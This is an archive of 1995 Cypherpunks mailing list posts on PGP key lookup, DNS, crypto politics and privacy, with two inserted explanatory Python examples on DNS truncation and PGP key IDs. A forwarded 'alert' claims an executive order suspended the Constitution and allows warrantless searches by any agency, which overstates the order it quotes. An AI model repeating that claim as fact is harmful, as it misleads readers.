Subject: Re: MIME based remailing commands
Message-ID: <9502110516.AA15719@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>	It doesn't matter if they disagree. If you don't have a To:
>line in the header then "Apparently-To:" gets tacked on using the "To"
>from the envelope.

... And all CC recipient and all BCC recipients as well.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 10 Feb 95 21:38:27 PST
To: pcassidy@world.std.com
Subject: Re: Bernstein
Message-ID: <9502110534.AA15867@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


djb@silverton wrote a few crypto thinks, including a cute modification
of the snefru hash that turned it into a crypto scheme called shuffle.

my guess is that he put it out on the net for ftp...  but i guess
we'll all find out when the article gets published.

djb would make a fun addition to this list.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 10 Feb 95 21:47:10 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Bernstein
In-Reply-To: <9502110534.AA15867@sulphur.osf.org>
Message-ID: <Pine.3.89.9502110059.B17884-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


-	I've E-mailed this guy and he has not answered. He may, just by 
some wild twist of fate, have a life and not spend his Friday evenings 
lunging at his terminal every five minutes to check his E-mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Sat, 11 Feb 95 01:39:54 PST
To: dls@mcs.com (David Sallach)
Subject: Re: Laws, Feds, & the Internet
Message-ID: <199502110940.BAA11278@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sat, 11 Feb 1995 01:41:09 -0600
> To:            cypherpunks@toad.com
> From:          dls@mcs.com (David Sallach)
> >
> >"Free" speech has always been a balancing act.  The founders
> >certainly didn't intend to provide "free" speech for blacks and
> >women.  
> 
>  The Founders created a larger space for free speech than had ever
> existed.  Slaves were deprived of many freedoms including speech, of course,
> but women and free blacks were included in the Bill of Rights and exercised
> free speech, frequently compellingly.  
> 
And were frequently thrown in jail for their pains - note especially 
the experiences of the early feminists [anachronistic label alert].  
And let us not forget what happened to the Mormons ...

> Check out Frederick Douglass' practicing oration while still a
> slave, and then winning his freedom to become one of the greatest
> abolitionist orators.  Consider the appreciation of diversity of thought and
> speech manifested by Jefferson, Lincoln and many other American political
> leaders.
> >

And Douglass spent a good portion of his life as a refugee in a 
protected enclave [Boston] where he had powerful friends to keep him 
from being arrested.

I'm not dissing the Founders, or the Bill of Rights -- just the 
simplified pap their invocation in most discourse has become.  I was 
trained in high school as a scientist, and in college as an 
historian, and in both instances to value the messy contingent 
realities over the tempting simplicities of ideology and theory.

And there are few contingent realities messier than the law ...

> > . . . "They" have never liked "free" speech ... :-(
> 
> Invoking politically 'correct' stereotypes does not strengthen your
> argument.
> 
> David Sallach

Irony-impaired, are we?

There's a Polish word, used by most of the populace after the 1979
coup to refer to the army and apparat, that is usually translated as
"them."  I [probably incorrectly] recall it as "Oni" -- would you
prefer it?

My own first encounter with the term "politically [in]correct" was
among 70's feminists, who used it ironically, to tell people they
needed a vacation/to get laid/to get a grip.  Would that Newt used it 
that way ...


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dls@mcs.com (David Sallach)
Date: Fri, 10 Feb 95 22:44:16 PST
To: cypherpunks@toad.com
Subject: Re: Laws, Feds, & the Internet
Message-ID: <m0rdBe4-000k50C@mailbox.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>"Free" speech has always been a balancing act.  The founders
>certainly didn't intend to provide "free" speech for blacks and
>women.  

        The Founders created a larger space for free speech than had ever
existed.  Slaves were deprived of many freedoms including speech, of course,
but women and free blacks were included in the Bill of Rights and exercised
free speech, frequently compellingly.  

        Check out Frederick Douglass' practicing oration while still a
slave, and then winning his freedom to become one of the greatest
abolitionist orators.  Consider the appreciation of diversity of thought and
speech manifested by Jefferson, Lincoln and many other American political
leaders.
>
> . . . "They" have never liked "free" speech ... :-(

        Invoking politically 'correct' stereotypes does not strengthen your
argument.

David Sallach





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Fri, 10 Feb 95 23:27:57 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
Message-ID: <m0rdCF4-000E2cC@dorite.use.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Perry E. Metzger" <perry@imsi.com> writes:
>>I'll also note, yet again, that unless PGP quits this bad practice of
>>identifying counterparties only by a number, it is NOT going to be
>>universally deployed. Counterparties need to be identified by a name
>>that can be looked up in the DNS -- meaning "joe@foo.com" rather than
>>some key ident number.
>
>PGP of course looks up keys by strings in addition to numbers.  A widely
>accepted practice is to use <joe@foo.com> in the user ID which allows the
>lookups to be by internet address.  PGP was intended for use beyond the
>internet, such as in bbs's, fidonet, corporate networks, etc., where DNS
>style addresses may not be useful.
 
I would prefer that PGP would not give out ANY info about addressees.  It 
would seem to me that it is quite a security breach to have PGP dutifully 
tell you to whom it is addressed.  
 
************************************************************
*           Just your basic signature block                *
*                                                          *
*  Al Thompson                                             *
*  Fidonet 1:231/110                                       *
*  alt@iquest.net                                          *
************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Network Security Observations <NSO@delphi.com>
Date: Fri, 10 Feb 95 23:20:30 PST
To: UNINFSEC@CUVMC.BITNET
Subject: new book pre announcement
Message-ID: <01HMWNKSYO6091RZVR@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain



ISM/NSO received the manuscript of 'Cryptography: Theory and Practice'
Author is Doug Stinson (Comp. Science/Eng. dept. University of Nebraska).
Publisher is CRC Press Inc.
Pages: 434
Chapters: 13
Format: Hardbound trimmed book 8,5 x 5,5
ISBN: not available yet
Expected release: within 3 months
Price: not available yet

Preliminary review (a full review will be published in Internet Security
Monthly)

The book starts - obvious - with classical cryptography. Hopping from shift
cipher, to substitution, to affine, to vigenere, to hill, to permutation, and
ending in the range of simple cryptosystems with stream ciphers.  A mature
subchapter is devoted to cryptanalysis, covering the affine, the substitution
and the vigenere. And providing a known plaintext attack on the hill cipher. 
The subchapter ends with the cryptanalysis of the LFSR-based stream cipher.  A 
next chapter discusses in depth Shannon's theory. This is followed by the
inevitable discussion of the DES, its modes of operation and includes an
attack on a 3 round DES, and an attack on a 6 round DES.  Chapter 4 discusses
RSA and factoring. Touching also the not much discussed Chinese Remainder
theorem. The Rabin scheme is reviewed. And within factoring Doug pays
attention to Dixon's Algorithm and the quadratic sieve.  Of course other
public key cryptosystems, as El Gamal, finite field, Merkle Hellman and
McEliece are discussed.  Doug explains signature schemes, as El Gamal and DSS
and touches undeniable and fail-stop. In Hash functions, after the basics,
among others MD4 and timestamping are issues of interest. In key distribution
and key agreement Blom's scheme, D-H, Kerberos, station to station, MIT key
agreement are noteworthy stops.  Another chapter goes into identification
schemes discussing Schnorr, Okamoto, Guillou-Quisquater, and a general
overview of conversion processes from identification to signature.   In
authentication codes a good discussion on computing deception probabilities,
and combinatorial bounds. In the latter orthogonal arrays are a topic of
interest. Doug also views the entropy bounds on deception probabilities.  A
next chapter introduces the Shamir threshold, the monotone circuit construction 
and Ernie Brickell's vector space, among others.  A separate chapter is
devoted to pseudo-random numbers, giving examples. The indistinguishable
probability distributions and the Blum/Blum/Shub generator are noteworthy.
Extra attention for probabilistic encryption.  As common for the subject,
close to the end of the book, zero-knowledge proofs are discussed in depth. 

The book is basically organized in three parts: private key cryptography,
public key cryptography and the introduction to four active research areas.
It's comprehensive in the 'core' areas of cryptography. Although
Cryptography: Theory and Practice is a text book, it certainly provides
researchers and practitioners in the field with material on less discussed
topics, and certainly invites for the development of new ideas.  The work
contains also a comprehensive reference section and the good workable index. 
Each chapter ends with exercise material. 

For the reader:
It is necessary to have at least some familiarity with basic linear algebra
and modular arithmetic. 

Compliments to Doug Stinson who sat many hours behind his terminal to get it
all straightened out, and to a professional publisher that is up to the job of
putting it all in print in such a layout that student, researcher and
professional are encouraged.

11 February 1995
Internet Security Monthly
Network Security Observations
Editorial Office

------
Note: if you want to copy this short review, distribute it on the net, please 
do so at will. This review is not copyrighted.  If you want more information
on the book, consider sending us an email. 
------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 10 Feb 95 13:44:31 PST
To: cypherpunks@toad.com
Subject: Re: Bernstein
Message-ID: <gate.8DLc1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Peter F Cassidy <pcassidy@world.std.com>:
> -       I am a writer on assignment from the Economist writing about a 
> certain cryptographers' tussle with the State Department, a fellow who is 
> known around the beltway crypto-anarchy, privacy, 
> niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 

There are two of them in my archives: "D. J. Bernstein" 
(djb@silverton.berkeley.edu) at Berkeley who visited the list once; and E.
Bernstein, the author of papers on quantum complexity along with U Vazirani.

I've never heard of either of them tussling with the State Department. Apart
from the name, though, several cryptographer/cypherpunks could fit the bill, 
from Phil Zimmermann of course to various people who've tried to extract ITAR
clearance or FOIA requests.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sat, 11 Feb 95 02:49:54 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: West (just a minute)
In-Reply-To: <9502102042.AA20803@toad.com>
Message-ID: <m0rdFOe-0002IhC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Hmm, 
how hard could it be to eliminate West page numbers?

There couldn't be more than a couple of cases on each page, 
if each page number were replaced by links to each case, a
lawyer could tell on the first glance which of the three was
right and mark it, assuming a reasonable HTML/SGML editor or
something.  Seems like it could be done as a part of daily work
and the results accreted somewhere.
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 11 Feb 95 05:31:40 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502110321.AA29986@toxicwaste.media.mit.edu>
Message-ID: <9502111331.AA16528@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins says:
> The only problem with piggybacking off the current DNS implementation
> is that DNS was designed for SMALL pieces of data (read: hostnames and
> IP addresses).  PGP keys are HUGE pieces of data, in respect, and DNS
> just won't handle the sizes.  For example, my PGP key is about 8k of
> data (approximately).  DNS would never be able to handle that!

Well, it's already been modified to do it. Read the drafts by Eastlake
and Kaufman on DNS security, which basically means keys in the DNS and
signed DNS records.

> If it's bigger than a single UDP packet DNS has trouble.

So you use TCP -- DNS already supports that. In any case, however, the
reassembly size and lowest common denominator MTUs are being jacked
way up for IPv6.

> No, while DNS is a perfect model for a distributed keyserver,
> it is by no means the implementation infrastructure that we want
> to use.

I very strongly disagree. Even today, we find more and more bugs in
DNS. If we had to start from scratch, we'd have to build an
infrastructure like DNS all over again, only to find that we suffer
from all the same old bugs and end up with a parallel implementation
that looks almost exactly like DNS only less reliable.

Perry
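
[Added example, not part of the original messages: the size limit Derek raises and the TCP fallback Perry points to, worked through on a DNS response that carries an 8k blob. The 512-byte UDP limit, the TC bit and the two-byte TCP length prefix are from RFC 1035; the owner name, the use of a TXT record as the carrier and the 8192-byte filler "key" are assumptions, not the record format of the drafts Perry cites.]

```python
import struct

UDP_LIMIT = 512     # RFC 1035: largest DNS message allowed over UDP
QR_FLAG = 0x8000    # header flag: this message is a response
TC_FLAG = 0x0200    # header flag: message was truncated
TYPE_TXT, CLASS_IN = 16, 1

KEY_NAME = "warlord.mit.edu"   # hypothetical owner name for the key record
KEY_BLOB = bytes(8192)         # constructed filler standing in for an ~8k key


def encode_name(name):
    """Domain name in wire format: length-prefixed labels, then a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError("label must be 1..63 bytes")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def txt_rdata(blob):
    """TXT RDATA: the blob cut into character-strings of at most 255 bytes."""
    chunks = (blob[i:i + 255] for i in range(0, len(blob), 255))
    return b"".join(bytes([len(c)]) + c for c in chunks)


def build_response(name, blob, msg_id=0x1234):
    """One question, one answer; the answer name is a pointer to offset 12."""
    rdata = txt_rdata(blob)
    if len(rdata) > 0xFFFF:
        raise ValueError("RDLENGTH is a 16-bit field")
    header = struct.pack("!HHHHHH", msg_id, QR_FLAG, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", TYPE_TXT, CLASS_IN)
    answer = (b"\xc0\x0c"
              + struct.pack("!HHIH", TYPE_TXT, CLASS_IN, 3600, len(rdata))
              + rdata)
    return header + question + answer


def udp_reply(message):
    """What fits in a UDP datagram: the whole message, or (one common server
    behaviour) header plus question with TC set and the answer dropped."""
    if len(message) <= UDP_LIMIT:
        return message
    msg_id, flags, qdcount = struct.unpack("!HHH", message[:6])
    pos = 12
    while message[pos] != 0:          # walk the labels of the question name
        pos += message[pos] + 1
    pos += 1 + 4                      # root label, then QTYPE and QCLASS
    header = struct.pack("!HHHHHH", msg_id, flags | TC_FLAG, qdcount, 0, 0, 0)
    return header + message[12:pos]


def is_truncated(reply):
    return bool(struct.unpack("!H", reply[2:4])[0] & TC_FLAG)


def tcp_frame(message):
    """DNS over TCP: the same message behind a two-byte length prefix."""
    if len(message) > 0xFFFF:
        raise ValueError("TCP length prefix is 16 bits")
    return struct.pack("!H", len(message)) + message


if __name__ == "__main__":
    full = build_response(KEY_NAME, KEY_BLOB)
    reply = udp_reply(full)
    print("full response:", len(full), "bytes")
    print("UDP reply:", len(reply), "bytes, truncated =", is_truncated(reply))
    if is_truncated(reply):           # resolver retries the query over TCP
        print("TCP retry carries", len(tcp_frame(full)), "bytes")
```
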




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 11 Feb 95 05:38:43 PST
To: cypherpunks@toad.com
Subject: Privacy vs. Ubiquitous Video: NetCam; Wearable WebCam, etc
Message-ID: <v01510100ab622813b24d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Saw this in technomads. Not necessarily crypto, but certainly privacy related...

Cheers,
Bob Hettinga


>Date: Fri, 10 Feb 95 19:11:08 -0500
>From: Steve Mann <steve@media.mit.edu>
>To: technomads@ucsd.edu
>Subject: NetCam; Wearable WebCam, etc
>Cc: steve@media.mit.edu
>
>
>I am an amateur television (ATV) hobbyist, interested in things like
>driving radio-controlled cars using a head mounted display (HMD)
>(which involves putting myself into the ``usual'' perspective
>of the car), or playing tennis with an HMD linked to a stand
>mounted camera (which is exactly the opposite: the radiocar is
>like a flight simulator from the cockpit, while the tennis example
>is like switching to the ``control tower'').  I've also been
>interested in wearable photographic equipment (such as a wearable
>2400J flashlamp I use for ``lightpainting'').
>
>More recently, I've become interested in sending and receiving
>video (and digital stills) over the WWW (e.g. Wearable WebCam,
>and WebCar -- radiocar on the WWW).
>
>I would like to hear from any other ATV hobbyists, people into
>packet radio, and those interested in wearable cameras, and
>combining wearable cameras with wearable computing.  Another
>application I was interested in was wearable vision (e.g. for
>the visually impaired, or simply to augment the regular human
>visual system).
>
>Therefore, I've started a new mailing list, ``netcam@media.mit.edu'',
>to discuss issues related to wearable cameras, as well as communications
>and computation issues associated with wearable cameras.  I am also
>interested in some of the privacy issues associated with wearable
>cameras (as I touch on in http://www-white.media.mit.edu/~steve),
>and the social implications of a society in which there are
>ubiquitous cameras (both wearable and fixed) connected to various
>high speed communications networks.
>
>If you would like to be added to netcam@media.mit.edu, please
>email netcam-request@media.mit.edu
>
>--steve

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 11 Feb 95 09:10:27 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <m0rdCF4-000E2cC@dorite.use.com>
Message-ID: <199502111709.JAA19315@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


alt@iquest.net (Al Thompson) writes:
>I would prefer that PGP would not give out ANY info about addressees.  It 
>would seem to me that it is quite a security breach to have PGP dutifully 
>tell you to whom it is addressed.  

PGP could be hacked fairly easily to do this (in fact there is a
program around called stealth that does this to some extent), however
in the context of this discussion we were discussing more the issue of
checking the signature on a file.  For that we do need a hint about
whose signature purports to be there.  PGP presently provides this in
the form of the low-order 64 bits of the key modulus, and this provides
problems in implementing the key database in distributed form.

Hal
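
The signature hint Hal describes, as an added example that is not part of the original message: it builds and parses a PGP 2.x style signature packet (layout as later documented in RFC 1991) and shows that the only signer information in it is the low-order 64 bits of the RSA modulus. The moduli are constructed stand-ins, and the `ZONES` table is a hypothetical model of a DNS-like key directory organized by mail address; it shows why a name leads to one zone while a bare key ID names no zone to ask.

```python
import struct

def key_id_from_modulus(n):
    """PGP 2.x key ID: the low-order 64 bits of the RSA modulus."""
    return (n & 0xFFFFFFFFFFFFFFFF).to_bytes(8, "big")

def encode_mpi(value):
    """Multiprecision integer: 16-bit bit count, then big-endian bytes."""
    bits = value.bit_length()
    return struct.pack(">H", bits) + value.to_bytes((bits + 7) // 8, "big")

def build_signature_packet(signer_modulus, timestamp, sig_value):
    """Assemble a version 3 signature packet (RSA, MD5, binary document)."""
    body = bytes([3, 5, 0x00]) + struct.pack(">I", timestamp)
    body += key_id_from_modulus(signer_modulus)   # the only signer hint
    body += bytes([1, 1])                         # PK algorithm RSA, digest MD5
    body += b"\x00\x00"                           # placeholder digest check bytes
    body += encode_mpi(sig_value)                 # constructed, not a real signature
    # CTB 0x89: old packet format, tag 2 (signature), two-byte length field
    return bytes([0x89]) + struct.pack(">H", len(body)) + body

def parse_signature_hint(packet):
    """Extract what a verifier learns about the signer before any key lookup."""
    if len(packet) < 2 or packet[0] & 0xC0 != 0x80:
        raise ValueError("not an old-format PGP packet")
    if (packet[0] >> 2) & 0x0F != 2:
        raise ValueError("not a signature packet")
    size = {0: 1, 1: 2, 2: 4}.get(packet[0] & 0x03)
    if size is None:
        raise ValueError("indeterminate-length packets are not handled here")
    length = int.from_bytes(packet[1:1 + size], "big")
    body = packet[1 + size:1 + size + length]
    if len(body) != length or length < 19:
        raise ValueError("truncated signature packet")
    if body[0] not in (2, 3) or body[1] != 5:
        raise ValueError("unexpected signature version or hashed length")
    return {
        "sig_type": body[2],
        "timestamp": int.from_bytes(body[3:7], "big"),
        "key_id": body[7:15],
        "pk_algo": body[15],
        "md_algo": body[16],
    }

# Constructed stand-ins for 1024-bit RSA moduli (not real keys).
ALICE_N = (0xC5 << 1016) | 0x1122334455667789
BOB_N = (0xD3 << 1016) | 0x99AABBCCDDEEFF01
CAROL_N = (0xE7 << 1016) | 0x0F1E2D3C4B5A6979

# Hypothetical distributed directory: one zone per mail domain.
ZONES = {
    "example.org": {"alice": ALICE_N},
    "example.net": {"bob": BOB_N},
    "example.com": {"carol": CAROL_N},
}

def lookup_by_address(address):
    """A name tells the client which zone to ask: one query."""
    user, zone = address.split("@")
    return ZONES[zone][user], 1

def lookup_by_key_id(key_id):
    """A key ID names no zone, so every zone may have to be asked."""
    asked = 0
    for zone, users in ZONES.items():
        asked += 1
        for user, modulus in users.items():
            if key_id_from_modulus(modulus) == key_id:
                return f"{user}@{zone}", asked
    return None, asked

if __name__ == "__main__":
    pkt = build_signature_packet(CAROL_N, 792518400, 0x1234 << 1000)
    hint = parse_signature_hint(pkt)
    print("key ID in packet:", hint["key_id"].hex().upper())
    print("found:", lookup_by_key_id(hint["key_id"]))
```
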




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 11 Feb 95 06:36:15 PST
To: cypherpunks@toad.com
Subject: NYT on Cybertheft and Sex Writer
Message-ID: <199502111435.JAA26507@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Ralph Blumenthal writes on NYC conference on "cyberthieves" of 
ideas and intellectual property.


For email copy send blank message to <jya@pipeline.com> with 
subject:  TEF_ida


Peter Lewis writes on the U Mich student arrested for posting 
fictional rough sex story.


For email copy, same, with subject:  RIT_xxx



----------

Also, for the famished, these not very fresh tomatoes:


Negroponte writes OpEd piece supporting Newt's idea for a 
laptop in every cave, arguing that it will help with 
international economic competition, especially against those 
countries with the youngest population.  NEG_poo


Peter Lewis writes on PSI's buy of Pipeline.  PSI_pip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sat, 11 Feb 95 07:41:00 PST
To: cypherpunks@toad.com
Subject: Four Horsemen of the Infopocalypse?
Message-ID: <199502111540.KAA05206@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Terrorists, Drug Dealers, Pornography and Piracy (copyright, patent & trademarks)
					  ^^^^^^
That's been left out... and likely it's the one some of the authorities
fear most. Money can be made off of terrorists, drug dealers and pornography
by allowing them to exist as a "threat" rather than actually stopping them.

Piracy is a whole different matter (though some would argue that it applies
to allow it as well...)

Off the subject of crypto, though....


Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 11 Feb 95 08:05:24 PST
To: cypherpunks@toad.com
Subject: Forwarded mail....
Message-ID: <Pine.SOL.3.90.950211105504.18090A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Linda does a good job but I frankly didn't believe this when I got it.
So I checked.  Unfortunately, this is true.

Herr Klinton has, by executive order, suspended part of the constitution 
which gives him his powers.  This is not logical, but if he has 
enough guys with guns backing him up, that doesn't matter.

Good luck to you all.  I may occasionally read my mail but from now
on my efforts are going to be focused on getting moved out of this 
hellhole before they "seal the borders." (another project of 
Janet Reno's)

Regards,
Brad Dolan

---------- Forwarded message ----------
Date: Sat, 11 Feb 95 05:06 EST
From: lindat@iquest.net
To: caji@aol.com

Please excuse any duplication to you.  I have not finished sorting out my
lists and only recently figured out the difference between individuals and
newsgroups (and have not yet gotten the names that are already in
newsgroups).  This was too important to wait on me to finish sorting.

***********************  ALERT   ALERT  ************************

WARRANTLESS SEARCHES CAN NOW BE APPROVED BY FREEH, RENO, DOD, ET
AL. AND CONDUCTED BY ANY FED AGENCY.  DUE TO THE CRIME BILL, THE FED
AGENCIES ARE NOW ALL OPERATING IN CONSOLIDATED "TASK FORCES."

   THIS EXECUTIVE ORDER ***SPECIFICALLY*** APPLIES TO ANYONE USING
            COMPUTER COMMUNICATIONS TO GATHER INFORMATION
              (SEE THE UNDERLYING LAW AT 50 USC 1801.)
              IT MAY ALSO BE USED TO APPLY TO MILITIAS BY THE
              AMBIGUOUS WORDING IN 50 USC 1801 and PL 103-359



                            THE WHITE HOUSE
                     Office of the Press Secretary
___________________________________________________________________
For Immediate Release                              February 9, 1995


                           EXECUTIVE ORDER

                            - - - - - - -
               FOREIGN INTELLIGENCE PHYSICAL SEARCHES


       By the authority vested in me as President by the
Constitution and the laws of the United States, including sections
302 and 303 of the Foreign Intelligence Surveillance Act of 1978
("Act") (50 U.S.C. 1801, et seq.), as amended by Public Law 103-
359, and in order to provide for the authorization of physical
searches for foreign intelligence purposes as set forth in the Act,
it is hereby ordered as follows:

       Section 1.  Pursuant to section 302(a)(1) of the Act, the
Attorney General is authorized to approve physical searches, without
a court order, to acquire foreign intelligence information for
periods of up to one year, if the Attorney General makes the
certifications required by that section.

       Sec. 2.  Pursuant to section 302(b) of the Act, the Attorney
General is authorized to approve applications to the Foreign
Intelligence Surveillance Court under section 303 of the Act to
obtain orders for physical searches for the purpose of collecting
foreign intelligence information.

       Sec. 3.  Pursuant to section 303(a)(7) of the Act, the
following officials, each of whom is employed in the area of
national security or defense, is designated to make the
certifications required by section 303(a)(7) of the Act in support
of applications to conduct physical searches:

       (a) Secretary of State;

       (b) Secretary of Defense;

       (c) Director of Central Intelligence;

       (d) Director of the Federal Bureau of
           Investigation;

       (e) Deputy Secretary of State;

       (f) Deputy Secretary of Defense; and

       (g) Deputy Director of Central Intelligence.

       None of the above officials, nor anyone officially acting in
that capacity, may exercise the authority to make the above
certifications, unless that official has been appointed by the
President, by and with the advice and consent of the Senate.


                         WILLIAM J. CLINTON


  THE WHITE HOUSE,
      February 9, 1995.


******************************************************************************
*  Dr. Linda D. Thompson                  NO JUSTICE, NO PEACE.              *
*  American Justice Federation                                               *
*  3850 S. Emerson Avenue, Suite E,  Indianapolis, IN 46203                  *
*  Telephone: (317) 780-5203      AEN News BBS: (317) 780-5211               *
*  Fax: (317) 780-5209                 Orders (Visa/MC) 1-800-749-9939       *
*  Internet:  Lindat@iquest.net                                              *
******************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: news@visionware.co.uk (Visionware News)
Date: Sat, 11 Feb 95 03:46:02 PST
To: cypherpunks@toad.com
Subject: automatic reply to test posting (lwall)
Message-ID: <9502111145.AA16693@wol.visionware.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



STOP!  Before you panic, read this message through to the end.

This message has been sent to you because you have posted an article to
one of the Usenet test groups (eg alt.test), and it arrived here at
Visionware (visionware.co.uk) on Sat 11 Feb, 11:44 GMT.

If you have not posted an article to one of these groups, then it is
possible that someone else did so while pretending to be you.  If you
are sure that this is the case then ask your Local Help Desk to help
you track down the perpetrator.  It is not possible to track down
forgeries from this site.

Many people like to see copies of the articles that they post, so that
they can see how far (and how quickly) their message has been
transmitted.  Accordingly, you will get at most one email message from
Visionware for each article you post to a *.test newsgroup.  You have
*not* been added to a subscription list.

It is not possible to stop the replies to other messages you may have
already posted, but in FUTURE POSTINGS you can prevent this
autoresponder from replying to you by including a phrase like "don't
reply" or "ignore this message".

This site, visionware.co.uk, is located at Visionware Ltd., which is in
lovely Leeds, West Yorkshire, England (53 48 34 N / 01 34 51 W).

In case you want to know, we're running INN 1.4sec.

We deliberately receive the 'ba' (Bay Area) distribution; this is for
our staff working from Menlo Park CA.


Feel free to send your comments, suggestions, and questions regarding
this auto-reply daemon to the administrator,
postmaster@visionware.co.uk (telephone +44 113 251-2000 and ask for the
System Administrator).  You should get a response to email within a day
or so; if not, then your message has probably not arrived.


Your article, as received here, follows:
> Path: visionware.co.uk!pipex!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
> Subject: lwall
> Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
> NNTP-Posting-Host: ack.berkeley.edu
> Organization: cypherpunks
> Lines: 2
> From: cypherpunks@toad.com
> Distribution: world
> Newsgroups: alt.test
> Date: 6 Feb 1995 19:34:19 GMT
> 
> test
> test
-- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@phantom.com>
Date: Sat, 11 Feb 95 09:14:07 PST
To: Rhys Kyraden <Jaeson.M.Engle@josaiah.sewanee.edu>
Subject: Re: S314 and potential hell-raising
In-Reply-To: <v0151011cab5f38526c94@[152.97.12.101]>
Message-ID: <Pine.3.89.9502111208.C13529-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



 
The ACLU (along with us and numerous other groups) are all very aware of 
S. 314. I briefed the Telecommunications Policy Roundtable, which is over 
100 public interest groups interested in telecom policy, about it last 
week and we are all gearing up to nail this sucker to the wall before it 
is included in the telecom bill. If you haven't called and screamed at 
your senator and congresscritter, do so now already (202) 224-3121.

-d





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Sat, 11 Feb 95 03:16:37 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Bernstein
In-Reply-To: <9502110534.AA15867@sulphur.osf.org>
Message-ID: <Pine.NEB.3.91.950211130522.23367d-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> djb@silverton wrote a few crypto thinks, including a cute modification
> of the snefru hash that turned it into a crypto scheme called shuffle.
> my guess is that he put it out on the net for ftp...

I don't think Dan Bernstein made shuffle available, but he did get into a
fight with various branches/departments/agencies of the US government
about his right to publish it.

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rick H. Wesson" <wessorh@ar.com>
Date: Sat, 11 Feb 95 13:49:58 PST
To: cypherpunks@toad.com
Subject: "Being Digital" spinde
Message-ID: <199502112143.NAA03166@ar.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought you guys would enjoy this...

I found out Nicholas Negroponte, the author of
"Being Digital" encoded a message in the spine of the book
all ones and zeros. It's a decent book, and not
